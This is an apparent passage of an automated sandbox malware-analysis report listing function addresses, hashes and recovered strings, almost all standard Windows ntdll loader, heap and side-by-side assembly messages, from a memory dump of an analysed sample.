                                                                                                                                    • Instruction ID: 275eb0913eeab179cd74e56bdad212bd26511b8cc7a058f77c00c70800628c04
                                                                                                                                    • Opcode Fuzzy Hash: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
                                                                                                                                    • Instruction Fuzzy Hash: 6FE046766102147BD220BA9ADC41FDBB7ACDBC9754F00445AFA18A7242C7B0B91086EA
                                                                                                                                    Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 131 1762c0a-1762c0f 132 1762c11-1762c18 131->132 133 1762c1f-1762c26 LdrInitializeThunk 131->133
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                                                    • Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
                                                                                                                                    • Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                                                    • Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-2160512332
                                                                                                                                    • Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                                                    • Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
                                                                                                                                    • Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                                                    • Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
                                                                                                                                    Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                                                                                                    • double initialized or corrupted critical section, xrefs: 01795508
                                                                                                                                    • 8, xrefs: 017952E3
                                                                                                                                    • Thread identifier, xrefs: 0179553A
                                                                                                                                    • undeleted critical section in freed memory, xrefs: 0179542B
                                                                                                                                    • corrupted critical section, xrefs: 017954C2
                                                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                                                                                                    • Invalid debug info address of this critical section, xrefs: 017954B6
                                                                                                                                    • Critical section address., xrefs: 01795502
                                                                                                                                    • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                                                                                                    • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                    • API String ID: 0-2368682639
                                                                                                                                    • Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                                                    • Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
                                                                                                                                    • Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                                                    • Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
                                                                                                                                    Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                                                                                                    • @, xrefs: 0179259B
                                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                    • API String ID: 0-4009184096
                                                                                                                                    • Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                                                    • Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
                                                                                                                                    • Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                                                    • Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
                                                                                                                                    Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                    • API String ID: 0-2515994595
                                                                                                                                    • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                    • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                                                                                                                    • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                    • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                                                                                                                    Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                    • API String ID: 0-1700792311
                                                                                                                                    • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                    • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                                                                                                                    • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                    • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                                                                                                                    Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • VerifierDlls, xrefs: 017A8CBD
                                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                                                                    • VerifierDebug, xrefs: 017A8CA5
                                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                                                                    • VerifierFlags, xrefs: 017A8C50
                                                                                                                                    • HandleTraces, xrefs: 017A8C8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                    • API String ID: 0-3223716464
                                                                                                                                    • Opcode ID: 47557527c9cbdfd01b9b7f0a8cd04aa51a3c9914bf4f9a674c14f15599e62b91
                                                                                                                                    • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                                                                                                                    • Opcode Fuzzy Hash: 47557527c9cbdfd01b9b7f0a8cd04aa51a3c9914bf4f9a674c14f15599e62b91
                                                                                                                                    • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                                                                                                    Function 0172EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                    • API String ID: 0-1109411897
                                                                                                                                    • Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                    • Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
                                                                                                                                    • Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                    • Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40
                                                                                                                                    Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-792281065
                                                                                                                                    • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                    • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                                                                                                                    • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                    • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                                                                                                                    Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • apphelp.dll, xrefs: 01716496
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                                                                    • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-204845295
                                                                                                                                    • Opcode ID: e49cd75af94a2931510ca99bce9f6f1582fb6979c96387e506e049c9dd7ab350
                                                                                                                                    • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
                                                                                                                                    • Opcode Fuzzy Hash: e49cd75af94a2931510ca99bce9f6f1582fb6979c96387e506e049c9dd7ab350
                                                                                                                                    • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                                                                                                                    Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                    • API String ID: 0-861424205
                                                                                                                                    • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                    • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                                                                                                                    • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                    • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                                                                                                                    Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                                                                    • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                                                                    • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                    • API String ID: 0-475462383
                                                                                                                                    • Opcode ID: 1057e5786fc599db291060d32a63e890f6d1d094d4bd5c48e01bc6d20b5d3ee3
                                                                                                                                    • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                                                                                                                    • Opcode Fuzzy Hash: 1057e5786fc599db291060d32a63e890f6d1d094d4bd5c48e01bc6d20b5d3ee3
                                                                                                                                    • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                                                                                                                    Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1404860816-0
                                                                                                                                    • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                    • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                                                                                                                    • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                    • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                                                                                                                    Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                    • API String ID: 0-379654539
                                                                                                                                    • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                    • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                                                                                                                    • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                    • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                                                                                                                    Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                                                                    • @, xrefs: 01758591
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                                                                    • LdrpInitializeProcess, xrefs: 01758422
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-1918872054
                                                                                                                                    • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                    • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
                                                                                                                                    • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                    • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                                                                                                                    Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • .Local, xrefs: 017528D8
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                    • API String ID: 0-1239276146
                                                                                                                                    • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                    • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                                                                                                                    • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                    • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                                                                                                                    Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                                                                    • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
